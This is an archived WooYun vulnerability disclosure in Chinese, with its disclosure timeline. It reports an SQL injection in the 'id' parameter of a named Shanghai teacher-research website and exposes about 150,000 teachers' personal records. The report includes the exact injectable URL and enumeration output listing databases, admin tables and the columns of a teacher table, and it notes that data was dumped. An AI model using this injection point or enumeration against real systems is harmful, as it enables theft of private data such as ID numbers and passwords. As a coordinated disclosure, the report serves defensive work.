乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-09: 细节已通知厂商并且等待厂商处理中 2015-07-13: 厂商已经确认,细节仅向厂商公开 2015-07-23: 细节向核心白帽子及相关领域专家公开 2015-08-02: 细节向普通白帽子公开 2015-08-12: 细节向实习白帽子公开 2015-08-27: 细节向公众公开
上海教研在线SQL注入导致15万教师隐私数据泄漏,包括用户名、密码、姓名、性别、email、院校、身份证号、电话、地址等。
问题出现在这个页面
http://jyzx.sjys.cn/shjyzx/newsShow.do?id=e063f9b4-e4c3-420c-bb20-3418b291e181
参数id可以注入
web application technology: JSPback-end DBMS: Oracle
数据库
available databases [20]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] JYSMH[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SHJYZX[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB
数据库JYSMH管理员信息
Database: JYSMH[12 tables]+----------------------+| T_ADMININFO || T_ADMINTYPEINFO || T_COURSEMATERIALINFO || T_DEPARTINFO || T_EDULEVELINFO || T_JURISDICTIONINFO || T_MAGAZINEINFO || T_NEWSINFO || T_PROJECTINFO || T_PROJECTTYPEINFO || T_REFORMREPOINFO || T_SUBJECTINFO |+----------------------+
数据库SHJYZX存有老师数据
Database: SHJYZXTable: T_USERINFO[32 columns]+---------------+----------+| Column | Type |+---------------+----------+| ADDRESS | VARCHAR2 || ADDTIME | VARCHAR2 || BIRTHDAY | VARCHAR2 || DELETED | VARCHAR2 || DEPARTCODE | VARCHAR2 || DISTRICTID | VARCHAR2 || EDULEVELCODE | VARCHAR2 || EMAIL | VARCHAR2 || ENAME | VARCHAR2 || GRADECODE | VARCHAR2 || ID | VARCHAR2 || IDCARD | VARCHAR2 || LASTLOGINTIME | VARCHAR2 || LOGINCNT | NUMBER || LOGINTIME | VARCHAR2 || MOBILE | VARCHAR2 || OLDXD | VARCHAR2 || OLDXK | VARCHAR2 || ORGFILENAME | VARCHAR2 || PICURL | VARCHAR2 || POSITIONCODE | VARCHAR2 || POST | VARCHAR2 || PWD | VARCHAR2 || REALNAME | VARCHAR2 || REMARK | VARCHAR2 || RESULTXD | VARCHAR2 || RESULTXK | VARCHAR2 || ROLEID | VARCHAR2 || SCHOOLID | VARCHAR2 || SEX | VARCHAR2 || SUBJECTCODE | VARCHAR2 || TELE | VARCHAR2 |+---------------+----------+
dump了一会儿,数据太多了
过滤
危害等级:高
漏洞Rank:11
确认时间:2015-07-13 14:56
CNVD确认所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。
暂无